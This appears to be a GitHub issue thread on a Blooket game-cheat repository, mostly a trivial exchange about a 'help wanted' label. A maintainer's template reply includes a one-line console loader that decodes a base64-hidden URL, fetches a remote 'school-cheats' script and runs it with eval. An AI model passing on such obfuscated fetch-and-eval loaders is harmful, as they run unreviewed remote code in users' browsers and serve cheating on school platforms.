### ISSUE TITLE
why theres one issue need help outside

### ISSUE THREAD

**Issue by Rookiehecker** [glixzzy/blooket-hack#526]

**Comment by 3kh0** [comment]
**Hello there!**

Your issue is not complete and we can not tell the problem!
Here are some questions you should answer when creating an issue:
- What browser do you use? 
- Are you on a school computer and/or connected to the school internet?
- Are you using a bookmarklet or are you pasting the code into the console?
- Has the code worked before?
- Is it the original code? This is what the original code would look like: `fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbFNwYW1PcGVuQm94ZXMuanM=')).then((res) => res.text().then((t) => eval(t)))`

Thank you for letting us know the issue! 😀

**Comment by Rookiehecker** [comment]
![Screenshot 2021-12-02 7 54 20 AM](https://user-images.githubusercontent.com/94798292/144426001-a0dc01e4-1196-4bd3-82da-145a4011e062.png)

**Comment by 3kh0** [comment]
> ![Screenshot 2021-12-02 7 54 20 AM](https://user-images.githubusercontent.com/94798292/144426001-a0dc01e4-1196-4bd3-82da-145a4011e062.png)

Ok, one of the issues has the `help wanted` label. That's all! Can we close this issue?

**Comment by Rookiehecker** [comment]
yes why its there

**Comment by 3kh0** [comment]
> yes why its there

Here, look at issue #496

**Comment by glixzzy** [comment]
fixed
